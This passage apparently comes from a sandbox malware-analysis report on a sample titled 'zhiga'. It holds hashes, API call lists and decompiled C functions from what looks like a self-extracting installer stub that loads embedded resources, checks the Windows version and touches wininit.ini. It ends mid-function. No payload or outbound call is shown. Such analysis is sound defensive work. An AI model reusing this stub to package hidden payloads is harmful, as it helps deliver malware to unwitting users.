                                                                        • Source File: 00000001.00000002.394128458.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                        • Associated: 00000001.00000002.394122906.0000000000F80000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394137580.0000000000F88000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8A000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8C000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f80000_brJg.jbxd
                                                                        Similarity
                                                                        • API ID: Char$Next$ByteFileLeadModuleNamePrevUpper
                                                                        • String ID:
                                                                        • API String ID: 571164536-0
                                                                        • Opcode ID: a8ca9a89a3e3fc53b4620afeba94990907e5431b106ec9ffc7a6fa276ca0ee91
                                                                        • Instruction ID: 9661ef238e8b256b6c7a8b87863ba2d7c40344dd726906a6f11e53b3f500099f
                                                                        • Opcode Fuzzy Hash: a8ca9a89a3e3fc53b4620afeba94990907e5431b106ec9ffc7a6fa276ca0ee91
                                                                        • Instruction Fuzzy Hash: D6413A34A051495FEF55AF348C54AFD7BA9DF92310F14009AE8C287202DF399E46EB50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 86%
                                                                        			E00F843D0(struct HWND__* __ecx, struct HWND__* __edx) {
                                                                        				signed int _v8;
                                                                        				struct tagRECT _v24;
                                                                        				struct tagRECT _v40;
                                                                        				struct HWND__* _v44;
                                                                        				intOrPtr _v48;
                                                                        				int _v52;
                                                                        				intOrPtr _v56;
                                                                        				int _v60;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t29;
                                                                        				void* _t53;
                                                                        				intOrPtr _t56;
                                                                        				int _t59;
                                                                        				struct HWND__* _t63;
                                                                        				struct HWND__* _t67;
                                                                        				struct HWND__* _t68;
                                                                        				struct HDC__* _t69;
                                                                        				int _t72;
                                                                        				signed int _t74;
                                                                        
                                                                        				_t63 = __edx;
                                                                        				_t29 =  *0xf88004; // 0x7e92e7a6
                                                                        				_v8 = _t29 ^ _t74;
                                                                        				_t68 = __edx;
                                                                        				_v44 = __ecx;
                                                                        				GetWindowRect(__ecx,  &_v40);
                                                                        				_t53 = _v40.bottom - _v40.top;
                                                                        				_v48 = _v40.right - _v40.left;
                                                                        				GetWindowRect(_t68,  &_v24);
                                                                        				_v56 = _v24.bottom - _v24.top;
                                                                        				_t69 = GetDC(_v44);
                                                                        				_v52 = GetDeviceCaps(_t69, 8);
                                                                        				_v60 = GetDeviceCaps(_t69, 0xa);
                                                                        				ReleaseDC(_v44, _t69);
                                                                        				_t56 = _v48;
                                                                        				asm("cdq");
                                                                        				_t72 = (_v24.right - _v24.left - _t56 - _t63 >> 1) + _v24.left;
                                                                        				_t67 = 0;
                                                                        				if(_t72 >= 0) {
                                                                        					_t63 = _v52;
                                                                        					if(_t72 + _t56 > _t63) {
                                                                        						_t72 = _t63 - _t56;
                                                                        					}
                                                                        				} else {
                                                                        					_t72 = _t67;
                                                                        				}
                                                                        				asm("cdq");
                                                                        				_t59 = (_v56 - _t53 - _t63 >> 1) + _v24.top;
                                                                        				if(_t59 >= 0) {
                                                                        					_t63 = _v60;
                                                                        					if(_t59 + _t53 > _t63) {
                                                                        						_t59 = _t63 - _t53;
                                                                        					}
                                                                        				} else {
                                                                        					_t59 = _t67;
                                                                        				}
                                                                        				return E00F86CE0(SetWindowPos(_v44, _t67, _t72, _t59, _t67, _t67, 5), _t53, _v8 ^ _t74, _t63, _t67, _t72);
                                                                        			}

                                                                        APIs
                                                                        • GetWindowRect.USER32(?,?), ref: 00F843F1
                                                                        • GetWindowRect.USER32(00000000,?), ref: 00F8440B
                                                                        • GetDC.USER32(?), ref: 00F84423
                                                                        • GetDeviceCaps.GDI32(00000000,00000008), ref: 00F8442E
                                                                        • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00F8443A
                                                                        • ReleaseDC.USER32(?,00000000), ref: 00F84447
                                                                        • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,00000005,?,00000001,?), ref: 00F844A2
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.394128458.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                        • Associated: 00000001.00000002.394122906.0000000000F80000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394137580.0000000000F88000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8A000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8C000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f80000_brJg.jbxd
                                                                        Similarity
                                                                        • API ID: Window$CapsDeviceRect$Release
                                                                        • String ID:
                                                                        • API String ID: 2212493051-0
                                                                        • Opcode ID: 3ec5185e1f41faafe966545b1ed98b1e943bcad60116f30e01ac2d99372ed2ba
                                                                        • Instruction ID: 5cdb442add0bc3976f4e91dee0f0fb7790f49e40224488fddb167cd6dc9ed3c0
                                                                        • Opcode Fuzzy Hash: 3ec5185e1f41faafe966545b1ed98b1e943bcad60116f30e01ac2d99372ed2ba
                                                                        • Instruction Fuzzy Hash: 6A315A32E0051DAFDB14DFB8DD889EEBBB5EB89310F254169F805F3250DA30AC059B60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 53%
                                                                        			E00F86298(intOrPtr __ecx, intOrPtr* __edx) {
                                                                        				signed int _v8;
                                                                        				char _v28;
                                                                        				intOrPtr _v32;
                                                                        				struct HINSTANCE__* _v36;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t16;
                                                                        				struct HRSRC__* _t21;
                                                                        				intOrPtr _t26;
                                                                        				void* _t30;
                                                                        				struct HINSTANCE__* _t36;
                                                                        				intOrPtr* _t40;
                                                                        				void* _t41;
                                                                        				intOrPtr* _t44;
                                                                        				intOrPtr* _t45;
                                                                        				void* _t47;
                                                                        				signed int _t50;
                                                                        				struct HINSTANCE__* _t51;
                                                                        
                                                                        				_t44 = __edx;
                                                                        				_t16 =  *0xf88004; // 0x7e92e7a6
                                                                        				_v8 = _t16 ^ _t50;
                                                                        				_t46 = 0;
                                                                        				_v32 = __ecx;
                                                                        				_v36 = 0;
                                                                        				_t36 = 1;
                                                                        				E00F8171E( &_v28, 0x14, "UPDFILE%lu", 0);
                                                                        				while(1) {
                                                                        					_t51 = _t51 + 0x10;
                                                                        					_t21 = FindResourceA(_t46,  &_v28, 0xa);
                                                                        					if(_t21 == 0) {
                                                                        						break;
                                                                        					}
                                                                        					_t45 = LockResource(LoadResource(_t46, _t21));
                                                                        					if(_t45 == 0) {
                                                                        						 *0xf89124 = 0x80070714;
                                                                        						_t36 = _t46;
                                                                        					} else {
                                                                        						_t5 = _t45 + 8; // 0x8
                                                                        						_t44 = _t5;
                                                                        						_t40 = _t44;
                                                                        						_t6 = _t40 + 1; // 0x9
                                                                        						_t47 = _t6;
                                                                        						do {
                                                                        							_t26 =  *_t40;
                                                                        							_t40 = _t40 + 1;
                                                                        						} while (_t26 != 0);
                                                                        						_t41 = _t40 - _t47;
                                                                        						_t46 = _t51;
                                                                        						_t7 = _t41 + 1; // 0xa
                                                                        						 *0xf8a288( *_t45,  *((intOrPtr*)(_t45 + 4)), _t44, _t7 + _t44);
                                                                        						_t30 = _v32();
                                                                        						if(_t51 != _t51) {
                                                                        							asm("int 0x29");
                                                                        						}
                                                                        						_push(_t45);
                                                                        						if(_t30 == 0) {
                                                                        							_t36 = 0;
                                                                        							FreeResource(??);
                                                                        						} else {
                                                                        							FreeResource();
                                                                        							_v36 = _v36 + 1;
                                                                        							E00F8171E( &_v28, 0x14, "UPDFILE%lu", _v36 + 1);
                                                                        							_t46 = 0;
                                                                        							continue;
                                                                        						}
                                                                        					}
                                                                        					L12:
                                                                        					return E00F86CE0(_t36, _t36, _v8 ^ _t50, _t44, _t45, _t46);
                                                                        				}
                                                                        				goto L12;
                                                                        			}

                                                                        APIs
                                                                          • Part of subcall function 00F8171E: _vsnprintf.MSVCRT ref: 00F81750
                                                                        • LoadResource.KERNEL32(00000000,00000000,?,?,00000002,00000000,?,00F851CA,00000004,00000024,00F82F71,?,00000002,00000000), ref: 00F862CD
                                                                        • LockResource.KERNEL32(00000000,?,?,00000002,00000000,?,00F851CA,00000004,00000024,00F82F71,?,00000002,00000000), ref: 00F862D4
                                                                        • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,00F851CA,00000004,00000024,00F82F71,?,00000002,00000000), ref: 00F8631B
                                                                        • FindResourceA.KERNEL32(00000000,00000004,0000000A), ref: 00F86345
                                                                        • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,00F851CA,00000004,00000024,00F82F71,?,00000002,00000000), ref: 00F86357
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.394128458.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                        • Associated: 00000001.00000002.394122906.0000000000F80000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394137580.0000000000F88000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8A000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8C000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f80000_brJg.jbxd
                                                                        Similarity
                                                                        • API ID: Resource$Free$FindLoadLock_vsnprintf
                                                                        • String ID: UPDFILE%lu
                                                                        • API String ID: 2922116661-2329316264
                                                                        • Opcode ID: fe12ebcf1929f11c5a9e7d1b056afb56cfede8c5affcc726db414384a53fa5e1
                                                                        • Instruction ID: 096558f961a4bfc61cf7c631631876f6364363db60d10102d41139e112eec9ba
                                                                        • Opcode Fuzzy Hash: fe12ebcf1929f11c5a9e7d1b056afb56cfede8c5affcc726db414384a53fa5e1
                                                                        • Instruction Fuzzy Hash: C121F671A00219ABEB10AFA4DC499FE7B7CFB44710B00021AF902E3241DB359D02ABE1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 94%
                                                                        			E00F8681F(void* __ebx) {
                                                                        				signed int _v8;
                                                                        				char _v20;
                                                                        				struct _OSVERSIONINFOA _v168;
                                                                        				void* _v172;
                                                                        				int* _v176;
                                                                        				int _v180;
                                                                        				int _v184;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t19;
                                                                        				long _t31;
                                                                        				signed int _t35;
                                                                        				void* _t36;
                                                                        				intOrPtr _t41;
                                                                        				signed int _t44;
                                                                        
                                                                        				_t36 = __ebx;
                                                                        				_t19 =  *0xf88004; // 0x7e92e7a6
                                                                        				_v8 = _t19 ^ _t44;
                                                                        				_t41 =  *0xf881d8; // 0xfffffffe
                                                                        				_t43 = 0;
                                                                        				_v180 = 0xc;
                                                                        				_v176 = 0;
                                                                        				if(_t41 == 0xfffffffe) {
                                                                        					 *0xf881d8 = 0;
                                                                        					_v168.dwOSVersionInfoSize = 0x94;
                                                                        					if(GetVersionExA( &_v168) == 0) {
                                                                        						L12:
                                                                        						_t41 =  *0xf881d8; // 0xfffffffe
                                                                        					} else {
                                                                        						_t41 = 1;
                                                                        						if(_v168.dwPlatformId != 1 || _v168.dwMajorVersion != 4 || _v168.dwMinorVersion >= 0xa || GetSystemMetrics(0x4a) == 0 || RegOpenKeyExA(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x20019,  &_v172) != 0) {
                                                                        							goto L12;
                                                                        						} else {
                                                                        							_t31 = RegQueryValueExA(_v172, 0xf81140, 0,  &_v184,  &_v20,  &_v180);
                                                                        							_t43 = _t31;
                                                                        							RegCloseKey(_v172);
                                                                        							if(_t31 != 0) {
                                                                        								goto L12;
                                                                        							} else {
                                                                        								_t40 =  &_v176;
                                                                        								if(E00F866F9( &_v20,  &_v176) == 0) {
                                                                        									goto L12;
                                                                        								} else {
                                                                        									_t35 = _v176 & 0x000003ff;
                                                                        									if(_t35 == 1 || _t35 == 0xd) {
                                                                        										 *0xf881d8 = _t41;
                                                                        									} else {
                                                                        										goto L12;
                                                                        									}
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        				return E00F86CE0(_t41, _t36, _v8 ^ _t44, _t40, _t41, _t43);
                                                                        			}

                                                                        APIs
                                                                        • GetVersionExA.KERNEL32(?,00000000,00000002), ref: 00F8686E
                                                                        • GetSystemMetrics.USER32(0000004A), ref: 00F868A7
                                                                        • RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 00F868CC
                                                                        • RegQueryValueExA.ADVAPI32(?,00F81140,00000000,?,?,0000000C), ref: 00F868F4
                                                                        • RegCloseKey.ADVAPI32(?), ref: 00F86902
                                                                          • Part of subcall function 00F866F9: CharNextA.USER32(?,00000001,00000000,00000000,?,?,?,00F8691A), ref: 00F86741
                                                                        Strings
                                                                        • Control Panel\Desktop\ResourceLocale, xrefs: 00F868C2
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.394128458.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                        • Associated: 00000001.00000002.394122906.0000000000F80000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394137580.0000000000F88000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8A000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8C000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f80000_brJg.jbxd
                                                                        Similarity
                                                                        • API ID: CharCloseMetricsNextOpenQuerySystemValueVersion
                                                                        • String ID: Control Panel\Desktop\ResourceLocale
                                                                        • API String ID: 3346862599-1109908249
                                                                        • Opcode ID: 63292bd12a7d01b1a19ff9d36df6a02092d7f4ef4ff2bb8df984a6fff1e343d3
                                                                        • Instruction ID: 5e4cdcefcdd49df0254a7cd117f3542546a212dab8753b31df69f90f0481b5ef
                                                                        • Opcode Fuzzy Hash: 63292bd12a7d01b1a19ff9d36df6a02092d7f4ef4ff2bb8df984a6fff1e343d3
                                                                        • Instruction Fuzzy Hash: 2E313C31E00228DFDB31AB51DD45BEAB7B9EB45778F0001A5E949E6180DB309E86EF52
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00F83A3F(void* __eflags) {
                                                                        				void* _t3;
                                                                        				void* _t9;
                                                                        				CHAR* _t16;
                                                                        
                                                                        				_t16 = "LICENSE";
                                                                        				_t1 = E00F8468F(_t16, 0, 0) + 1; // 0x1
                                                                        				_t3 = LocalAlloc(0x40, _t1);
                                                                        				 *0xf88d4c = _t3;
                                                                        				if(_t3 != 0) {
                                                                        					_t19 = _t16;
                                                                        					if(E00F8468F(_t16, _t3, _t28) != 0) {
                                                                        						if(lstrcmpA( *0xf88d4c, "<None>") == 0) {
                                                                        							LocalFree( *0xf88d4c);
                                                                        							L9:
                                                                        							 *0xf89124 = 0;
                                                                        							return 1;
                                                                        						}
                                                                        						_t9 = E00F86517(_t19, 0x7d1, 0, E00F83100, 0, 0);
                                                                        						LocalFree( *0xf88d4c);
                                                                        						if(_t9 != 0) {
                                                                        							goto L9;
                                                                        						}
                                                                        						 *0xf89124 = 0x800704c7;
                                                                        						L2:
                                                                        						return 0;
                                                                        					}
                                                                        					E00F844B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                        					LocalFree( *0xf88d4c);
                                                                        					 *0xf89124 = 0x80070714;
                                                                        					goto L2;
                                                                        				}
                                                                        				E00F844B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                        				 *0xf89124 = E00F86285();
                                                                        				goto L2;
                                                                        			}







                                                                        APIs
                                                                          • Part of subcall function 00F8468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00F846A0
                                                                          • Part of subcall function 00F8468F: SizeofResource.KERNEL32(00000000,00000000,?,00F82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00F846A9
                                                                          • Part of subcall function 00F8468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00F846C3
                                                                          • Part of subcall function 00F8468F: LoadResource.KERNEL32(00000000,00000000,?,00F82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00F846CC
                                                                          • Part of subcall function 00F8468F: LockResource.KERNEL32(00000000,?,00F82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00F846D3
                                                                          • Part of subcall function 00F8468F: memcpy_s.MSVCRT ref: 00F846E5
                                                                          • Part of subcall function 00F8468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00F846EF
                                                                        • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00F82F64,?,00000002,00000000), ref: 00F83A5D
                                                                        • LocalFree.KERNEL32(00000000,00000000,00000010,00000000,00000000), ref: 00F83AB3
                                                                          • Part of subcall function 00F844B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00F84518
                                                                          • Part of subcall function 00F844B9: MessageBoxA.USER32(?,?,zhiga,00010010), ref: 00F84554
                                                                          • Part of subcall function 00F86285: GetLastError.KERNEL32(00F85BBC), ref: 00F86285
                                                                        • lstrcmpA.KERNEL32(<None>,00000000), ref: 00F83AD0
                                                                        • LocalFree.KERNEL32 ref: 00F83B13
                                                                          • Part of subcall function 00F86517: FindResourceA.KERNEL32(00F80000,000007D6,00000005), ref: 00F8652A
                                                                          • Part of subcall function 00F86517: LoadResource.KERNEL32(00F80000,00000000,?,?,00F82EE8,00000000,00F819E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00F86538
                                                                          • Part of subcall function 00F86517: DialogBoxIndirectParamA.USER32(00F80000,00000000,00000547,00F819E0,00000000), ref: 00F86557
                                                                          • Part of subcall function 00F86517: FreeResource.KERNEL32(00000000,?,?,00F82EE8,00000000,00F819E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00F86560
                                                                        • LocalFree.KERNEL32(00000000,00F83100,00000000,00000000), ref: 00F83AF4
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.394128458.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                        • Associated: 00000001.00000002.394122906.0000000000F80000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394137580.0000000000F88000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8A000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8C000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f80000_brJg.jbxd
                                                                        Similarity
                                                                        • API ID: Resource$Free$Local$FindLoad$AllocDialogErrorIndirectLastLockMessageParamSizeofStringlstrcmpmemcpy_s
                                                                        • String ID: <None>$LICENSE
                                                                        • API String ID: 2414642746-383193767
                                                                        • Opcode ID: 406b4e378b7158b032ef692b86b51c349143a542b2ab3f86b1b221eb43cd2b28
                                                                        • Instruction ID: 6a8943fccb5941db224efa4346a7741be0122548405fb68394f72c7b7cbc4e2e
                                                                        • Opcode Fuzzy Hash: 406b4e378b7158b032ef692b86b51c349143a542b2ab3f86b1b221eb43cd2b28
                                                                        • Instruction Fuzzy Hash: 2611D672704205ABD724BF729C0DFF779B9EBD5B50B10412EB541DA1B1EABD9802B720
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 94%
                                                                        			E00F824E0(void* __ebx) {
                                                                        				signed int _v8;
                                                                        				char _v268;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t7;
                                                                        				void* _t20;
                                                                        				long _t26;
                                                                        				signed int _t27;
                                                                        
                                                                        				_t20 = __ebx;
                                                                        				_t7 =  *0xf88004; // 0x7e92e7a6
                                                                        				_v8 = _t7 ^ _t27;
                                                                        				_t25 = 0x104;
                                                                        				_t26 = 0;
                                                                        				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
                                                                        					E00F8658A( &_v268, 0x104, "wininit.ini");
                                                                        					WritePrivateProfileStringA(0, 0, 0,  &_v268);
                                                                        					_t25 = _lopen( &_v268, 0x40);
                                                                        					if(_t25 != 0xffffffff) {
                                                                        						_t26 = _llseek(_t25, 0, 2);
                                                                        						_lclose(_t25);
                                                                        					}
                                                                        				}
                                                                        				return E00F86CE0(_t26, _t20, _v8 ^ _t27, 0x104, _t25, _t26);
                                                                        			}












                                                                        APIs
                                                                        • GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,00000000), ref: 00F82506
                                                                        • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,?), ref: 00F8252C
                                                                        • _lopen.KERNEL32(?,00000040), ref: 00F8253B
                                                                        • _llseek.KERNEL32(00000000,00000000,00000002), ref: 00F8254C
                                                                        • _lclose.KERNEL32(00000000), ref: 00F82555
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.394128458.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                        • Associated: 00000001.00000002.394122906.0000000000F80000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394137580.0000000000F88000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8A000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8C000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f80000_brJg.jbxd
                                                                        Similarity
                                                                        • API ID: DirectoryPrivateProfileStringWindowsWrite_lclose_llseek_lopen
                                                                        • String ID: wininit.ini
                                                                        • API String ID: 3273605193-4206010578
                                                                        • Opcode ID: dc81203c369446bbc4cd6c1a2683949f007b9022488b1e5f08c39ce59561e621
                                                                        • Instruction ID: 332e8665e8469580608c41832836f5eab2903e12a3eb633747f354da73c673ee
                                                                        • Opcode Fuzzy Hash: dc81203c369446bbc4cd6c1a2683949f007b9022488b1e5f08c39ce59561e621
                                                                        • Instruction Fuzzy Hash: 7E01B532A0011867D720AB65DC0CEEF7B7CEB45760F040155FA49D7190DE749E46DB91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 75%
                                                                        			E00F836EE(CHAR* __ecx) {
                                                                        				signed int _v8;
                                                                        				char _v268;
                                                                        				struct _OSVERSIONINFOA _v416;
                                                                        				signed int _v420;
                                                                        				signed int _v424;
                                                                        				CHAR* _v428;
                                                                        				CHAR* _v432;
                                                                        				signed int _v436;
                                                                        				CHAR* _v440;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t72;
                                                                        				CHAR* _t77;
                                                                        				CHAR* _t91;
                                                                        				CHAR* _t94;
                                                                        				int _t97;
                                                                        				CHAR* _t98;
                                                                        				signed char _t99;
                                                                        				CHAR* _t104;
                                                                        				signed short _t107;
                                                                        				signed int _t109;
                                                                        				short _t113;
                                                                        				void* _t114;
                                                                        				signed char _t115;
                                                                        				short _t119;
                                                                        				CHAR* _t123;
                                                                        				CHAR* _t124;
                                                                        				CHAR* _t129;
                                                                        				signed int _t131;
                                                                        				signed int _t132;
                                                                        				CHAR* _t135;
                                                                        				CHAR* _t138;
                                                                        				signed int _t139;
                                                                        
                                                                        				_t72 =  *0xf88004; // 0x7e92e7a6
                                                                        				_v8 = _t72 ^ _t139;
                                                                        				_v416.dwOSVersionInfoSize = 0x94;
                                                                        				_t115 = __ecx;
                                                                        				_t135 = 0;
                                                                        				_v432 = __ecx;
                                                                        				_t138 = 0;
                                                                        				if(GetVersionExA( &_v416) != 0) {
                                                                        					_t133 = _v416.dwMajorVersion;
                                                                        					_t119 = 2;
                                                                        					_t77 = _v416.dwPlatformId - 1;
                                                                        					__eflags = _t77;
                                                                        					if(_t77 == 0) {
                                                                        						_t119 = 0;
                                                                        						__eflags = 1;
                                                                        						 *0xf88184 = 1;
                                                                        						 *0xf88180 = 1;
                                                                        						L13:
                                                                        						 *0xf89a40 = _t119;
                                                                        						L14:
                                                                        						__eflags =  *0xf88a34 - _t138; // 0x0
                                                                        						if(__eflags != 0) {
                                                                        							goto L66;
                                                                        						}
                                                                        						__eflags = _t115;
                                                                        						if(_t115 == 0) {
                                                                        							goto L66;
                                                                        						}
                                                                        						_v428 = _t135;
                                                                        						__eflags = _t119;
                                                                        						_t115 = _t115 + ((0 | _t119 != 0x00000000) - 0x00000001 & 0x0000003c) + 4;
                                                                        						_t11 =  &_v420;
                                                                        						 *_t11 = _v420 & _t138;
                                                                        						__eflags =  *_t11;
                                                                        						_v440 = _t115;
                                                                        						do {
                                                                        							_v424 = _t135 * 0x18;
                                                                        							_v436 = E00F82A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_t135 * 0x18 + _t115)),  *((intOrPtr*)(_t135 * 0x18 + _t115 + 4)));
                                                                        							_t91 = E00F82A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_v424 + _t115 + 0xc)),  *((intOrPtr*)(_v424 + _t115 + 0x10)));
                                                                        							_t123 = _v436;
                                                                        							_t133 = 0x54d;
                                                                        							__eflags = _t123;
                                                                        							if(_t123 < 0) {
                                                                        								L32:
                                                                        								__eflags = _v420 - 1;
                                                                        								if(_v420 == 1) {
                                                                        									_t138 = 0x54c;
                                                                        									L36:
                                                                        									__eflags = _t138;
                                                                        									if(_t138 != 0) {
                                                                        										L40:
                                                                        										__eflags = _t138 - _t133;
                                                                        										if(_t138 == _t133) {
                                                                        											L30:
                                                                        											_v420 = _v420 & 0x00000000;
                                                                        											_t115 = 0;
                                                                        											_v436 = _v436 & 0x00000000;
                                                                        											__eflags = _t138 - _t133;
                                                                        											_t133 = _v432;
                                                                        											if(__eflags != 0) {
                                                                        												_t124 = _v440;
                                                                        											} else {
                                                                        												_t124 = _t133[0x80] + 0x84 + _t135 * 0x3c + _t133;
                                                                        												_v420 =  &_v268;
                                                                        											}
                                                                        											__eflags = _t124;
                                                                        											if(_t124 == 0) {
                                                                        												_t135 = _v436;
                                                                        											} else {
                                                                        												_t99 = _t124[0x30];
                                                                        												_t135 = _t124[0x34] + 0x84 + _t133;
                                                                        												__eflags = _t99 & 0x00000001;
                                                                        												if((_t99 & 0x00000001) == 0) {
                                                                        													asm("sbb ebx, ebx");
                                                                        													_t115 =  ~(_t99 & 2) & 0x00000101;
                                                                        												} else {
                                                                        													_t115 = 0x104;
                                                                        												}
                                                                        											}
                                                                        											__eflags =  *0xf88a38 & 0x00000001;
                                                                        											if(( *0xf88a38 & 0x00000001) != 0) {
                                                                        												L64:
                                                                        												_push(0);
                                                                        												_push(0x30);
                                                                        												_push(_v420);
                                                                        												_push("zhiga");
                                                                        												goto L65;
                                                                        											} else {
                                                                        												__eflags = _t135;
                                                                        												if(_t135 == 0) {
                                                                        													goto L64;
                                                                        												}
                                                                        												__eflags =  *_t135;
                                                                        												if( *_t135 == 0) {
                                                                        													goto L64;
                                                                        												}
                                                                        												MessageBeep(0);
                                                                        												_t94 = E00F8681F(_t115);
                                                                        												__eflags = _t94;
                                                                        												if(_t94 == 0) {
                                                                        													L57:
                                                                        													0x180030 = 0x30;
                                                                        													L58:
                                                                        													_t97 = MessageBoxA(0, _t135, "zhiga", 0x00180030 | _t115);
                                                                        													__eflags = _t115 & 0x00000004;
                                                                        													if((_t115 & 0x00000004) == 0) {
                                                                        														__eflags = _t115 & 0x00000001;
                                                                        														if((_t115 & 0x00000001) == 0) {
                                                                        															goto L66;
                                                                        														}
                                                                        														__eflags = _t97 - 1;
                                                                        														L62:
                                                                        														if(__eflags == 0) {
                                                                        															_t138 = 0;
                                                                        														}
                                                                        														goto L66;
                                                                        													}
                                                                        													__eflags = _t97 - 6;
                                                                        													goto L62;
                                                                        												}
                                                                        												_t98 = E00F867C9(_t124, _t124);
                                                                        												__eflags = _t98;
                                                                        												if(_t98 == 0) {
                                                                        													goto L57;
                                                                        												}
                                                                        												goto L58;
                                                                        											}
                                                                        										}
                                                                        										__eflags = _t138 - 0x54c;
                                                                        										if(_t138 == 0x54c) {
                                                                        											goto L30;
                                                                        										}
                                                                        										__eflags = _t138;
                                                                        										if(_t138 == 0) {
                                                                        											goto L66;
                                                                        										}
                                                                        										_t135 = 0;
                                                                        										__eflags = 0;
                                                                        										goto L44;
                                                                        									}
                                                                        									L37:
                                                                        									_t129 = _v432;
                                                                        									__eflags = _t129[0x7c];
                                                                        									if(_t129[0x7c] == 0) {
                                                                        										goto L66;
                                                                        									}
                                                                        									_t133 =  &_v268;
                                                                        									_t104 = E00F828E8(_t129,  &_v268, _t129,  &_v428);
                                                                        									__eflags = _t104;
                                                                        									if(_t104 != 0) {
                                                                        										goto L66;
                                                                        									}
                                                                        									_t135 = _v428;
